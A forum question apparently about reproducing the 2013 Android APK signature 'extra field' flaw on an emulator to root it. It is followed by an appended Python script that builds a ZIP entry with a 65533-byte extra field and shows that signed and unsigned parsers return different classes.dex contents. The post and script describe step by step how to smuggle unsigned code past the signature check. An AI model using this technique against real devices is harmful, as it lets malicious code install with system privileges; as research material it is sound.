[Q] Is the APK signature verification extra field bug patched in older API versions?
Sorry in advance if I posted this in the wrong place, as I am not allowed to post in the Android devs-only forum.
I am currently investigating the extra field flaw in APK signature verification discovered in July 2013 by trying to replicate it on the AVD.
First of all, this is research only, as I am trying to understand my system's internals and especially permission handling.
What I am trying to achieve is to root the AVD by using the elevated permissions of an APK signed with the platform key.
1. I have an APK signed with the platform key from my CyanogenMod 10.2 device, and a classes.dex under 65k in size that will try to install SuperSU on my AVD.
2. When creating a new APK, I put the original classes.dex into the extra field of the corresponding ZIP entry and pad it to a size of 65533.
3. The rooting classes.dex goes into the data field of the ZIP entry, and the extra length is set to 65533, or -3 as seen by the buggy verifier. This classes.dex is also padded to exactly the size of the original classes.dex.
4. My MainActivity tries to install the just-assembled APK.
Expected result: as the verifier validates the original classes by jumping 3 backwards instead of 65533 forward, the APK should be installed with elevated system privileges.
Actual result: the AVD refuses installation of the APK with error code -103, as the "digest of classes.dex does not match those in the apk".
My thoughts on what may cause this:
A) I know that Google merged the fix for this bug into HEAD, but it should still work on AVD 2.3 and 4.1.
Or are all versions of the AVD patched against extra field exploitation? As I update my APIs every day, the fix is likely to be in my AVD.
Correct me if I am wrong.
B) As I use a CyanogenMod 10.2 APK as the base, the platform keys may not match those of the AVD.
If so, the error should be different from -103, something like "system user signature does not match".
Would someone please point me in the right direction?
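The ZIP layout described in steps 1 to 4, as an added example that is not part of the original post and is not Android code: a Python script that builds a single ZIP local file header whose extra field length is 0xFFFD (65533) and then parses the same bytes twice, once with that length read as an unsigned 16-bit value, as the ZIP format defines it, and once as a signed short, which is the reading the question attributes to the buggy verifier. The file name, both "dex" contents and the padding are constructed here; the observation that the signed reading starts 3 bytes before the end of the file name follows from the offset arithmetic in the code, not from any source the question cites. No central directory is written and no manifest digest is computed; the example only shows which bytes each parser would hash.

```python
"""Constructed example: signed vs unsigned ZIP extra-field length.

Builds one ZIP local file record in memory whose 16-bit 'extra field length'
is 0xFFFD and shows that a parser reading that field as unsigned (65533) and
one reading it as a signed short (-3) hand back different entry contents.
Nothing here is an APK and nothing touches a device or emulator.
"""
import struct
import zlib

LOCAL_HDR_SIG = 0x04034B50
LOCAL_HDR_LEN = 30            # fixed part of a local file header
EXTRA_LEN_MAGIC = 0xFFFD      # 65533 unsigned, -3 as a signed 16-bit value


def build_local_entry(name: bytes, data: bytes, extra: bytes) -> bytes:
    """Local file header + name + extra field + stored (uncompressed) data.

    Only the local record is produced (no central directory); that is all
    the offset calculation needs. CRC and sizes describe `data`, the bytes
    that sit after the extra field.
    """
    header = struct.pack(
        "<IHHHHHIIIHH",
        LOCAL_HDR_SIG,
        20,                              # version needed to extract
        0,                               # general purpose bit flags
        0,                               # compression method: stored
        0, 0,                            # last mod time / date
        zlib.crc32(data) & 0xFFFFFFFF,
        len(data),                       # compressed size
        len(data),                       # uncompressed size
        len(name),
        len(extra),
    )
    return header + name + extra + data


def read_entry_data(buf: bytes, signed_extra_len: bool) -> bytes:
    """Return the bytes a parser believes are the entry's stored data.

    signed_extra_len=False reads the extra length as unsigned, as the ZIP
    specification defines it. True reads it as a signed short, the reading
    the question attributes to the buggy verifier.
    """
    fmt = "<IHHHHHIIIHh" if signed_extra_len else "<IHHHHHIIIHH"
    (sig, _ver, _flags, _method, _time, _date, _crc,
     csize, _usize, name_len, extra_len) = struct.unpack_from(fmt, buf, 0)
    if sig != LOCAL_HDR_SIG:
        raise ValueError("not a local file header")
    data_off = LOCAL_HDR_LEN + name_len + extra_len   # may go *backwards*
    return buf[data_off:data_off + csize]


def build_demo() -> dict:
    """Assemble the entry the question describes and return both readings.

    Constructed contents: `original` stands in for the platform-signed
    classes.dex, `replacement` for the rooting one. Both are 64 bytes, as
    the question pads them to equal length. A real dex file begins with
    the magic bytes "dex\\n035\\0"; the stand-ins start the same way.
    """
    original = b"dex\n035\x00" + b"O" * 56
    replacement = b"dex\n035\x00" + b"R" * 56
    name = b"classes.dex"

    # With extra_len read as -3, data starts 3 bytes before the end of the
    # name, so the last three name bytes ("dex") become the first three
    # bytes the signed parser hashes. The extra field therefore carries
    # `original` minus its first 3 bytes, padded out to exactly 0xFFFD.
    extra = original[3:]
    extra += b"\x00" * (EXTRA_LEN_MAGIC - len(extra))
    assert len(extra) == EXTRA_LEN_MAGIC

    entry = build_local_entry(name, replacement, extra)
    return {
        "original": original,
        "replacement": replacement,
        "unsigned_view": read_entry_data(entry, signed_extra_len=False),
        "signed_view": read_entry_data(entry, signed_extra_len=True),
    }


if __name__ == "__main__":
    r = build_demo()
    print("unsigned parser sees replacement:", r["unsigned_view"] == r["replacement"])
    print("signed parser sees original:     ", r["signed_view"] == r["original"])
```

Running it prints True twice: the spec-conformant parser returns the replacement content, the signed-short parser returns the original. A digest mismatch on install, whatever the numeric code, is what any installer reports whenever the bytes it hashes are not the bytes the manifest digest was computed over, so a parser on the device that has gone back to the unsigned reading will hash the replacement and reject it; whether a given emulator image still contains the signed reading is exactly what the question asks.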